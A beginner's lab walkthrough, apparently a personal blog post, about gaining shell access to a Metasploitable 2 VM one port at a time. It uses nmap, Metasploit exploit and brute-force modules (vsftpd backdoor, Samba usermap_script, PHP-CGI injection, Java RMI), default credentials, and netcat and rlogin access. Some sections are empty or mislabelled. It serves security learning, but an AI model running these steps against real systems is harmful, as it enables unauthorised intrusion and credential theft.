(My first tried Exploit) Metasploitable 2 shell access via ports
Muaz Ibn Masud
Certified Cybersecurity Practitioner (need to learn a lot more), IT Guy, and WordPress Developer @ The Graphicshop | Tech Editor @ Techifybiz.com, Coxtour.xyz | TryHackMe Top 5% and more...
To crack the Metasploitable 2’s server, first we will try with Nmap Port scan. So for my Metasploitable 2 I have to use this command: nmap -p- 192.168.31.138. (nmap = software name, -p- = said to scan all 65350, and 192.168.31.138 = the ip of Metasploitable 2)
The result is as like as this:
So to exploit the first port which is FTP. I have to enumerate the port 21/tcp, with this nmap command: nmap -p 21 -A 192.168.31.138. (-p 21 = specified to scan only 21/tcp, -A = Aggressive scan)
So I have founded this result:
Nmap scan report for 192.168.31.138
Host is up (0.00028s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 192.168.31.136
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| vsFTPd 2.3.4 - secure, fast, stable
|_End of status
MAC Address: 00:0C:29:93:94:FF (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Unix
TRACEROUTE
HOP RTT ADDRESS
1 0.28 ms 192.168.31.138
FTP/21/TCP
Here the FTP 21 service is vsftpd 2.3.4 So Let’s find some exploits related to vsftpd 2.3.4
To find exploits first lets visit msfconsole by simply type msfconsole at the terminal. The interface might looks like this:
Now let us search for the FTP service vsftpd 2.3.4 with the command search vsftpd 2.3.4 And yah we have founded one Backdoor Command Execution exploit. So to use it, we may type use 0. And to know what information msfconsole needs. We may type options.
Here they only need the RPORT and RHOST (here R means Remote PORT/HOST) So let’s type the rhost only as the rport is being filled with ftp already. To set RHOST, let’s type set rhost 192.168.31.138. So The rhost have been setted. Now to exploit we simply write, run or exploit. So, that the exploit have been run. And the result similar to below image:
And Horrah! The service is exploited, let’s type whoami to know my name:
And yah I’m root of msfconsole and let’s type pwd to print the working directory:
And, we are in the root page… So FTP/21/TCP has been cracked.
SSH/21/TCP
Let’s dive into the SSH port 21/TCP.. First let’s scan the port 21 with Nmap with nmap -T4 -p 22 -A 192.168.31.138 (-T4 = 4x quick scan, -p 22 = scan only 22 ssh port)
SO We have founded some extra informations like the version, OS etc. So here we all know that ssh is very secure to crack. So we have to brute-force… For this let’s search ssh in msfconsole with the command steps of:
msfconsole To go to the framework
Search openssh for searching ssh exploits
And let’s use auxiliary/scanner/ssh/ssh_enumusers to find the username
options to see what to provide
Set RHOSTS 192.168.31.138 (you have to give your own Host IP)
Set USER_FILE /usr/share/legion/wordlists/ssh-user.txt to brute-force with theses
Run to exploit
And hurrah! We have founded the Username:
And founded 2 users: root and msfadmin
So know we may brute-force the user and password with the help of a ssh exploit.
To do:
msfconsole To go to the framework
Search ssh_login for searching ssh exploits
And let’s use auxiliary/scanner/ssh/ssh_login to do the attack
options to see what to provide
Set RHOSTS 192.168.31.138 (you have to give your own Host IP)
set username msfadmin to brute-force with this username.
set PASS_FILE /usr/share/legion/wordlists/ssh-pass-test.txt to brute-force with this Pass list.
set STOP_ON_SUCCESS true to stop after found the pass
Run to exploit
And yah, we found the pass
So to login, we may use this command: ssh username@target_ipaddress
For me it’s ssh msfadmin@192.168.31.138
And after this type password msfadmin. And finally we are in!
Telnet/23/TCP
To do the Telnet 23/tcp first lets do some Nmap scan with nmap -T4 -p 23 -A 192.168.31.138 (-p 23 = scan in only port 23)
Now, the result is similar to this:
Not any good infos.
So, let’s go to telnet 192.168.31.138. Here we can see the password is given for us:
So let’s try with these informations.
And yah we are connected… Horry!
SMTP/25/TCP
For SMTP 25/tcp let’s do a quick Nmap search with nmap -T4 -p 25 -A 192.168.31.138
And the result is similar to this:
Founded some informations like the version which is: Postfix smtpd
So we will follow the below steps:
msfconsole To go to the framework
Search smtp_enum for searching ssh exploits
And let’s use auxiliary/scanner/smtp/smtp_enum to find the username
options to see what to provide
Set RHOSTS 192.168.31.138 (you have to give your own Host IP)
Run to exploit
Now, we have to verify all the guessed users “backup, bin, daemon, distccd, ftp, games, gnats, irc, libuuid, list, lp, mail, man, mysql, news, nobody, postfix, postgres, postmaster, proxy, service, sshd, sync, sys, syslog, user, uucp, www-data”
To do let’s find some interesting with common sense. I selected user, service, sshd, and daemon.
Now to verify let’s verify with the following steps:
telnet 192.168.31.138 25
Vrfy user, service, sshd, daemon (one by one)
For me I have founded all theses as verified.
The result was:
vrfy user
252 2.0.0 user
vrfy service
252 2.0.0 service
vrfy sshd
252 2.0.0 sshd
vrfy daemon
252 2.0.0 daemon
And 252 means to verified
And yah, this is maximum we can do with SMTP.
Domain/53/TCP
Let’s do some Nmap… The nmap command we are used is nmap -T4 -p 53 -A 192.168.31.138.
And, found the version is: ISC BIND 9.4.2
__________________________________________
Http/80/TCP
Let’s do some Nmap… The nmap command we are used is nmap -T4 -p 80 -A 192.168.31.138.
We can see the version is Apache httpd 2.2.8 ((Ubuntu) DAV/2)
And now let’s find some directories of 192.168.31.138 via dirbuster.
Here is are some steps:
Type dirbuster in the terminal.
And use these informations:
Press start button.
Here we found a directory named http://192.168.31.138:80/index.php. So that it’s sure that the server is PHP. So we can go to msfconsole and find with search php_cgi and use exploit/multi/http/php_cgi_arg_injection. Here We have to Set RHOSTS 192.168.31.138 (you have to give your own Host IP). And run. And yah, we have gotten access to the service as shell access.
rpcbind/111/TCP
After running Nmap I found the service version is 2 (RPC #100000)
netbios-ssn/139/TCP
Let’s do the Nmap scan with nmap -p 139 -A 192.168.31.138. And we have founded the version name which is Samba smbd 3.0.20-Debian (workgroup: WORKGROUP). And the Domain name: localdomain.
So, in Msfconsole, let’s type search 3.0.20. And, We have a exploit:
To use it let’s type use exploit/multi/samba/usermap_script in terminal. And then we may follow below steps:
options to see options.
set rhosts 192.168.31.138 in the msfconsole.
The port is already been setted as 139.
Now type set lport 4445
Now let’s run.
And yah, we have the access to the shell. And let’s verify it by typing whoami
microsoft-ds/445/TCP
Let’s do some nmap on port 445. So, the version is Samba smbd 3.0.20-Debian. And we may use msfconsole to crack this. Le’t follow the steps:
use exploit/multi/samba/usermap_script
options to see options.
set rhosts 192.168.31.138 in the msfconsole.
set rport 445
Now type set lport 4445
Now let’s run.
And yah, we have the access to the shell. And let’s verify it by typing whoami
Exec, login, shell/512, 513, 514/TCP
To access shell for all the above ports, we have to do simple steps only:
sudo apt install rsh-redone-client
rlogin -l root 192.168.31.138
And you are in… Type whoami or else…
rmiregistry/1099/TCP
To access the 1099 port. We have to go to msfconsole and type use multi/misc/java_rmi_server. After this We have to use this command set rhost 192.168.31.138. And simply type run.
And you are in…
ingreslock/1524/TCP
Let’s type only: netcat 192.168.31.138 1524.
And yah we have the access
nfs/2049/TCP
_____________________
ccproxy-ftp/2121/TCP
First go to msfconsol and type use auxiliary/scanner/ftp/ftp_login.
Then, follow this instruction:
And then type run.
And, the password is founded:
Now to access the shell, Let’s type: ftp msfadmin@192.168.31.138 2121. And password as msfadmin.
And, we are in…!
mysql/3306/TCP
To exploit mysql we have to follow the below steps:
msfconsole
search mysql_login
use auxiliary/scanner/mysql/mysql_login
options
set rhosts 192.168.31.138
set STOP_ON_SUCCESS true
set USERNAME
set USERNAME -
set USERNAME
set USERNAME /
set userpass_file /usr/share/metasploit-framework/data/wordlists/piata_ssh_userpass.txt
(Every above commands you have to write one by one)
And, horry! You are in!
To access just write mysql -h 192.168.31.138 -u msfadmin. And type “” as password
distccd/3632/TCP
_____________________________
postgresql/5432/TCP
First go to msfconsole. Then use the below shown commands:
Now write exploit and Enter
And yah, you have the password.
Now go to new terminal and type: psql -h 192.168.31.138 -U postgres -d template1.
And in Password filed, type postgres. Thats it, you are in like:
vnc/5900/TCP
Open msfconsole, and type: use auxiliary/scanner/vnc/vnc_login
Now use the below commands in your terminal:
And yah, after typing exploit, you have gotten the password which is “password”.
To gain access type vncviewer 192.168.31.138:5900. And in the password filed type “password”. That’s it… You are in!
x11/6000/TCP
_________________________________________
x11/6000/TCP